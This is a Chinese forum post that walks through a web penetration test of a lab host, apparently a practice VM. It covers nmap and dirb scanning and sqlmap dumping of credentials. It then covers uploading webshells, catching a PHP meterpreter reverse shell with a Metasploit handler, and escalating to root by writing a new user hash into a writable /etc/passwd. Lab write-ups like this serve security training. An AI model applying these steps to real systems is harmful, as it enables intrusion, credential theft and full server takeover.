电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1878 人浏览分享

记一次web渗透过程

[复制链接]
1878 0
前言

通过信息收集 收集网站可能存在的漏洞然后进行漏洞复现 攻击外网服务器 从而获取外网
服务器的权限进而对服务器进行提权 留后门等操作。

目录:

一、记一次web渗透过程
二、web渗透---SQL盲注漏洞
三、记一次SEMCMS代码审计过

信息收集:

Nmap -sP 10.10.10.0/24

对10.10.10.10.0网段进行收集 收集存活的主机ip

105229ya32ashjhrhrppz2.png

nmap -sT- O 10.10.10.128

对该ip进行端口的枚举爆破

105243gjcciidbc4hzihho.png

收集网站的路径目录信息

105251kttghgpjkbggtj7y.png

利用椰树对网站进行一个漏洞扫描(目录信息收集)

99.png

利用AWVS扫描器对网站进行一个全面的扫描 收集信息

98.png

漏洞利用

找到了存在sql注入漏洞的页面 http://10.10.10.128/se3reTdir777/

用sqlmap跑出数据库(aiweb1和information_schema)

105319x97sz494s96lw4ri.png

Sqlmap -r/root/2.txt --dump -D aiweb1

跑出aiweb1数据库下的信息
账号:t00r           密码:FakeUserPassw0rd
账号:aiweb1pwn  密码:MyEvilPass_f908sdaf9_sadfasf0sa
账号:u3er    密码:N0tThis0neAls0

97.png

dirb http://10.10.10.128

dirb指令获取网站目录 (将之前信息收集的网站目录都放进去看看有没有子目录出来)

96.png

枚举路径找到了一个phpinfo页面

92.png

在phpinfo界面看到了网站的根目录/home/www/html/web1x443290o2sdf92213

105343ol82ghqf2utygfen.png

枚举路径找到上传的路径 但是打开该网页没有服务

91.png

执行Sqlmap工具的--os-shell
尝试找到网站根路径(把之前phpinfo的根路径放进去子目录添加)
最后在上传路径下找到了 然后找到了上传的点

90.png

找到上传路径后 寻找是否存在文件上传漏洞 上小马 传大马 这里两者都没有做限制直接上传了

89.png

大马连接文件管理

88.png

小马连接中国蚁剑

87.png

在蚁剑的文件管理中找到了一个数据库配置文件 有了用户名跟密码(信息泄露)

86.png

中国蚁剑连接数据库

82.png

思路一:

利用中国蚁剑的虚拟终端添加root用户

81.png

切换交互式界面失败

80.png

可以利用反弹shell来获取虚拟终端

69.png

思路二:

只利用kali进行

php脚本反弹shell

68.png

file-write 从本地写入 file-dest 写入目标路径(必须是dba权限)

66.png

浏览上传php脚本的页面触发反弹shell

62.png

开启监听
  1. use exploit/multi/handler
  2. set payload php/meterpreter/reverse_tcp
  3. set lhost 10.10.10.129
  4. set lport 8080
  5. run
复制代码

61.png

发现/etc/passwd这个目录是可读写的 openssl passwd创建一个web123用户并产生密文

60.png

  1. openssl passwd -1 -salt xxxxxxxx password
  2. Prints $1$xxxxxxxx$UYCIxa628.9qXjpQCjM4a.
  3. -l:使用MD5加密
  4. -salt:使用指定的盐。当读取来自终端的密码(web123)
复制代码

19.png

密文字符串格式为:$id$salt$encrypted,通过$来分割 其中$id用来指定使用的算法
这里是MD5算法 $id=1

18.png

17.png

当非交互式界面无法切换时
python -c 'import pty;pty.spawn("/bin/bash")'
进入交互式界面切换用户
切换root用户

16.png

总结

在做渗透测试的时候尽量能够获取webshell 如果获取不到webshell可以在有文件上传的地方上
传反弹shell脚本:或者利用漏洞 系统漏洞 服务器漏洞 第三方软件漏洞 数据库漏洞来获取shell
方便进行下一步的渗透测试。

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.